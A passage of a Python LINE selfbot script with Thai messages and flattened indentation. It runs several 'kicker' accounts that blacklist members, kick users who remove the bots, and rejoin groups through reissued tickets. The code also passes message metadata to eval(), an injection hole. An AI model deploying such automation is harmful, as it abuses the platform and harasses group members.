profile_A.displayName = string
profile_B.displayName = string
profile_C.displayName = string
profile_D.displayName = string
ki.updateProfile(profile_A)
kk.updateProfile(profile_B)
kc.updateProfile(profile_C)
ke.updateProfile(profile_D)
line.sendMessage(msg.to,"คุณได้เปลี่ยนชื่อคลิ้กเกอร์ เป็น " + string)
print ("Update Name All Kicker")
elif "ตัสคลิ้ก: " in text.lower():
if msg._from in Family:
proses = text.split(": ")
string = text.replace(proses[0] + ": ","")
profile_A = ki.getProfile()
profile_B = kk.getProfile()
profile_C = kc.getProfile()
profile_D = kc.getProfile()
profile_A.statusMessage = string
profile_B.statusMessage = string
profile_C.statusMessage = string
profile_D.statusMessage = string
ki.updateProfile(profile_A)
kk.updateProfile(profile_B)
kc.updateProfile(profile_C)
ke.updateProfile(profile_D)
line.sendMessage(msg.to,"Update Bio All Kicker to : " + string)
print ("Update Bio All Kicker")
elif text.lower() == "sai":
if msg._from in Family:
profile = ki.getProfile()
text = profile.displayName + ""
ki.sendMessage(to, text)
profile = kk.getProfile()
text = profile.displayName + ""
kk.sendMessage(to, text)
profile = kc.getProfile()
text = profile.displayName + ""
kc.sendMessage(to, text)
profile = ke.getProfile()
text = profile.displayName + ""
ke.sendMessage(to, text)
print ("สั่งคลิ้กเข้า")
#=============COMMAND PROTECT=========================#
elif msg.text.lower() == 'protect on':
if RfuProtect["protect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกัน ")
else:
line.sendMessage(msg.to,"เปิดป้องกัน ")
else:
RfuProtect["protect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกัน ")
else:
line.sendMessage(msg.to,"เปิดป้องกัน ")
elif msg.text.lower() == 'protect off':
if RfuProtect["protect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกัน ")
else:
line.sendMessage(msg.to,"ปิดป้องกัน ")
else:
RfuProtect["protect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกัน ")
else:
line.sendMessage(msg.to,"ปิดป้องกัน ")
elif msg.text.lower() == 'cancel on':
if RfuProtect["cancelprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
RfuProtect["cancelprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญสมาชิก ")
elif msg.text.lower() == 'cancel off':
if RfuProtect["cancelprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"ปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
RfuProtect["cancelprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันยกเลิกเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"ปิดป้องกันยกเลิกเชิญสมาชิก ")
elif msg.text.lower() == 'invit on':
if RfuProtect["inviteprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"เปิดป้องกันเชิญสมาชิก ")
else:
RfuProtect["inviteprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"เปิดป้องกันเชิญสมาชิก ")
elif msg.text.lower() == 'invit off':
if RfuProtect["inviteprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิก ")
else:
RfuProtect["inviteprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิก ")
else:
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิก ")
elif msg.text.lower() == 'link on':
if RfuProtect["linkprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม ")
else:
RfuProtect["linkprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม ")
elif msg.text.lower() == 'link off':
if RfuProtect["linkprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันลิ้งกลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันลิ้งกลุ่ม ")
else:
RfuProtect["linkprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันลิ้งกลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันลิ้งกลุ่ม ")
elif msg.text.lower() == 'guest on':
if RfuProtect["Protectguest"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันสมาชิกกลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันสมาชิกกลุ่ม ")
else:
RfuProtect["Protectguest"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันสมาชิกกลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันสมาชิก กลุ่ม ")
elif msg.text.lower() == 'guest off':
if RfuProtect["Protectguest"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันสมาชิกกลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันสมาชิกกลุ่ม ")
else:
RfuProtect["Protectguest"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันสมาชิกกลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันสมาชิกกลุ่ม ")
elif msg.text.lower() == 'join on':
if RfuProtect["Protectjoin"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันคนเข้ากลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันคนเข้ากลุ่ม ")
else:
RfuProtect["Protectjoin"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันคนเข้ากลุ่ม ")
else:
line.sendMessage(msg.to,"เปิดป้องกันคนเข้ากลุ่ม ")
elif msg.text.lower() == 'join off':
if RfuProtect["Protectjoin"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม ")
else:
RfuProtect["Protectjoin"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม ")
else:
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม ")
elif msg.text.lower() == 'เปิดหมด':
if RfuProtect["inviteprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันทั้งหมดเรียบร้อยแล้ว")
else:
line.sendMessage(msg.to,"เปิดป้องกันทั้งหมดเรียบร้อยแล้ว")
else:
RfuProtect["inviteprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันเชิญกลุ่ม")
if RfuProtect["cancelprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
else:
RfuProtect["cancelprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
if RfuProtect["protect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
else:
RfuProtect["protect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันเตะสมาชิกคนในกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันเตะสมาชิกคนในกลุ่ม")
if RfuProtect["linkprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม")
else:
RfuProtect["linkprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม")
if RfuProtect["Protectguest"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันกลุ่ม")
else:
RfuProtect["Protectguest"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันกลุ่ม")
if RfuProtect["Protectjoin"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันบุคคลภายน้อกเข้ากลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันบุคคลภายน้อกเข้ากลุ่ม")
else:
RfuProtect["Protectjoin"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันบุคคลภายน้อกเข้ากลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันบุคคลภายน้อกเข้ากลุ่ม")
elif msg.text.lower() == 'ปิดหมด':
if RfuProtect["inviteprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันทั้งหมดเรียบร้อยแล้ว")
else:
line.sendMessage(msg.to,"ปิดป้องกันทั้งหมดเรียบร้อยแล้ว")
else:
RfuProtect["inviteprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิกกลุ่ม")
if RfuProtect["cancelprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันยกเชิญสมาชิกกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันยกเชิญสมาชิกกลุ่ม")
else:
RfuProtect["cancelprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันยกเชิญสมาชิกกลุ่ม")
if RfuProtect["protect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเตะสมาชิกกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันเตะสมาชิกกลุ่ม")
else:
RfuProtect["protect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเตะสมาชิกกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันเตะสมาชิกกลุ่ม")
if RfuProtect["linkprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเปิดลิ้งกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันเปิดลิ้งกลุ่ม")
else:
RfuProtect["linkprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเปิดลิ้งกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันเปิดลิ้งกลุ่ม")
if RfuProtect["Protectguest"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันกลุ่ม")
else:
RfuProtect["Protectguest"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันกลุ่ม")
if RfuProtect["Protectjoin"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม")
else:
RfuProtect["Protectjoin"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม")
#==============FINNISHING PROTECT========================#
elif msg.text.lower() == 'เปิดคนเข้า':
if settings["Sd"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"เปิดข้อความต้อนรับคนเข้ากลุ่ม")
else:
settings["Sd"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"เปิดข้อความต้อนรับคนเข้ากลุ่ม")
elif msg.text.lower() == 'ปิดคนเข้า':
if settings["Sd"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"ปิดข้อความต้อนรับคนเข้ากลุ่ม")
else:
settings["Sd"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"ปิดข้อความต้อนรับคนเข้ากลุ่ม")
elif msg.text.lower() == 'เปิดคนออก':
if settings["Nn"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"เปิดข้อความคนออก")
else:
settings["Nn"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"เปิดข้อความคนออก")
elif msg.text.lower() == 'ปิดคนออก':
if settings["Nn"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"ปิดข้อความคนออก")
else:
settings["Nn"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"ปิดข้อความคนออก")
elif text.lower() == '1ลบรัน':
gid = line.getGroupIdsInvited()
start = time.time()
for i in gid:
line.rejectGroupInvitation(i)
elapsed_time = time.time() - start
line.sendMessage(to, "ลบรันเสร็จแล้วขอรับ")
line.sendMessage(to, "ระยะเวลาที่ใช้: %sวินาที" % (elapsed_time))
elif "Allban" in msg.text:
if msg._from in Family:
if msg.toType == 2:
print ("All Banlist")
_name = msg.text.replace("Allban","")
gs = line.getGroup(msg.to)
line.sendMessage(msg.to,"Banned all")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
line.sendMessage(msg.to,"Maaf")
else:
for target in targets:
if not target in Family:
try:
settings["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
line.sentMessage(msg.to,"สมาชิกทั้งหมดได้รับการเพิ่มแบนแล้ว")
elif 'ban' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
settings["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
line.sendMessage(msg.to,"เพิ่มขึ้นสำหรับบัญชีดำ ")
print ("Banned User")
except:
line.sendMessage(msg.to,"ไม่พบ")
elif 'unban' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del settings["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
line.sendMessage(msg.to,"ยกเลิกบัญชีจากบัญชีดำ")
print ("Unbanned User")
except:
line.sendMessage(msg.to,"ไม่พบ")
elif msg.text in ["เช็คดำ"]:
if msg._from in Family:
if settings["blacklist"] == {}:
line.sendMessage(msg.to,"ไม่พบ")
else:
line.sendMessage(msg.to,"รายชื่อผู้ติดดำ")
mc = "Blacklist User\n"
for mi_d in settings["blacklist"]:
mc += "➢ " + line.getContact(mi_d).displayName + " \n"
line.sendMessage(msg.to, mc + "")
elif msg.text.lower().startswith("urban "):
sep = msg.text.split(" ")
judul = msg.text.replace(sep[0] + " ","")
url = "http://api.urbandictionary.com/v0/define?term="+str(judul)
with requests.session() as s:
s.headers["User-Agent"] = random.choice(settings["userAgent"])
r = s.get(url)
data = r.text
data = json.loads(data)
y = "[ Result Urban ]"
y += "\nTags: "+ data["tags"][0]
y += ","+ data["tags"][1]
y += ","+ data["tags"][2]
y += ","+ data["tags"][3]
y += ","+ data["tags"][4]
y += ","+ data["tags"][5]
y += ","+ data["tags"][6]
y += ","+ data["tags"][7]
y += "\n[1]\nAuthor: "+str(data["list"][0]["author"])
y += "\nWord: "+str(data["list"][0]["word"])
y += "\nLink: "+str(data["list"][0]["permalink"])
y += "\nDefinition: "+str(data["list"][0]["definition"])
y += "\nExample: "+str(data["list"][0]["example"])
line.sendMessage(to, str(y))
elif msg.contentType == 7:
if settings["checkSticker"] == True:
stk_id = msg.contentMetadata['STKID']
stk_ver = msg.contentMetadata['STKVER']
pkg_id = msg.contentMetadata['STKPKGID']
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
ret_ += "\nSTICKER ID : {}".format(stk_id)
ret_ += "\nSTICKER PACKAGES ID : {}".format(pkg_id)
ret_ += "\nSTICKER VERSION : {}".format(stk_ver)
ret_ += "\nSTICKER URL : line://shop/detail/{}".format(pkg_id)
ret_ += "\n Ŧ€Āʍ ĦĀ¢₭€Ɖ ĊΦƉ€"
line.sendMessage(to, str(ret_))
#==============================================================================#
if op.type == 19:
if op.param2 in Family:
pass
if op.param2 in RfuBot:
pass
else:
if op.param3 in lineMID:
if op.param2 not in Family:
try:
G = ki.getGroup(op.param1)
G = kk.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = kk.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
line.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
random.choice(Rfu).updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in kiMID:
if op.param2 not in Family:
try:
G = kk.getGroup(op.param1)
G = kc.getGroup(op.param1)
kk.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kc.updateGroup(G)
ticket = kc.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
kk.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
ki.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in kkMID:
if op.param2 not in Family:
try:
G = kc.getGroup(op.param1)
G = ki.getGroup(op.param1)
kc.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kc.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
kk.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
random.choice(Rfu).updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in kcMID:
if op.param2 not in Family:
try:
G = kk.getGroup(op.param1)
G = ke.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
kc.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
random.choice(Rfu).updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in keMID:
if op.param2 not in Family:
try:
G = ki.getGroup(op.param1)
G = kc.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
ke.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
random.choice(Rfu).updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.type == 19:
if lineMID in op.param3:
settings["blacklist"][op.param2] = True
if op.type == 22:
if settings['leaveRoom'] == True:
line.leaveRoom(op.param1)
ki.leaveRoom(op.param1)
kk.leaveRoom(op.param1)
kc.leaveRoom(op.param1)
ke.leaveRoom(op.param1)
if op.type == 24:
if settings['leaveRoom'] == True:
line.leaveRoom(op.param1)
ki.leaveRoom(op.param1)
kk.leaveRoom(op.param1)
kc.leaveRoom(op.param1)
ke.leaveRoom(op.param1)
#==============================================================================#
if op.type == 19:
try:
if op.param3 in lineMID:
if op.param2 in kiMID:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
line.updateGroup(G)
else:
G = ki.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ki.updateGroup(G)
settings["blacklist"][op.param2] = True
elif op.param3 in kiMID:
if op.param2 in lineMID:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = kk.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
kk.updateGroup(G)
else:
G = kk.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = kk.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ki.updateGroup(G)
settings["blacklist"][op.param2] = True
elif op.param3 in kkMID:
if op.param2 in kiMID:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ki.updateGroup(G)
settings["blacklist"][op.param2] = True
elif op.param3 in kcMID:
if op.param2 in kkMID:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = kk.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
kk.updateGroup(G)
else:
G = kk.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kk.updateGroup(G)
